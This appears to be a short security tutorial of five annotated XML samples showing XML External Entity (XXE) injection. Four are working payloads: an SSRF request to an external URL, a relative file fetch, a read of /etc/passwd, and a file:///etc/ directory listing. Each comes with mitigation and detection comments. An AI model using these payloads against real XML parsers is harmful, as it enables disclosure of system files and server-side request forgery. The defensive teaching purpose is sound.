XML External Entity (XXE)

example 1

<?xml version="1.0"?>
<!-- Baseline: internal general entities only. Both values are declared inline
     in the DTD subset, so expanding them reads nothing outside this document.
     Shown for contrast with external (SYSTEM) entities. A parser hardened to
     reject every DOCTYPE declaration will refuse this harmless document too. -->
<!DOCTYPE change-log [
  <!ENTITY myName 'Michal'>
  <!ENTITY mySurname 'Szalkowski'>
]>
<change-log>
    <!-- Expands to the two literal values declared above. -->
    <text>&myName; &mySurname;</text>
</change-log>

example 2

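<?xml version="1.0"?>
<!-- External general entity over HTTP. If the parser resolves SYSTEM
     identifiers, parsing this document makes the parsing host request the URL
     below and try to substitute the response into <text>. This is the
     server-side request forgery (SSRF) form of XXE.
     Mitigation: disable DTD processing, or at minimum external entity
     resolution, in every parser that handles untrusted XML.
     Detection: outbound requests from a host whose only job is parsing XML. -->
<!DOCTYPE change-log [
  <!ENTITY systemEntity SYSTEM "http://blog.michalszalkowski.com/feed/">
]>
<change-log>
    <text>&systemEntity;</text>
</change-log>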

example 3

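<?xml version="1.0"?>
<!-- External entity with a relative system identifier. A resolving parser
     interprets "robots.txt" against the base URI of this document, so what is
     fetched depends on where the parser believes the document came from.
     Mitigation: disable DTD processing or external entity resolution. Do not
     rely on the identifier looking harmless. -->
<!DOCTYPE change-log [
  <!ENTITY systemEntity SYSTEM "robots.txt">
]>
<change-log>
    <text>&systemEntity;</text>
</change-log>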

example 4

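<?xml version="1.0"?>
<!-- External entity naming a local path with no URI scheme. Many parsers
     treat such an identifier as a file on the parsing host, so an application
     that echoes the parsed <text> value back to the sender discloses the file
     contents (local file disclosure).
     Mitigation: disable DTD processing or external entity resolution, and run
     the parsing service with least-privilege file-system access. -->
<!DOCTYPE change-log [
  <!ENTITY systemEntity SYSTEM "/etc/passwd">
]>
<change-log>
    <text>&systemEntity;</text>
</change-log>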

example 5

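<?xml version="1.0"?>
<!-- External entity using an explicit file: URI that names a directory
     rather than a file. What a resolving parser returns for a directory is
     implementation-dependent: some runtimes produce a listing, others fail.
     Defensive takeaway: the file: scheme has to be blocked as a whole by
     disabling external entity resolution. A deny-list of specific file names
     does not cover this case. -->
<!DOCTYPE change-log [
  <!ENTITY systemEntity SYSTEM "file:///etc/">
]>
<change-log>
    <text>&systemEntity;</text>
</change-log>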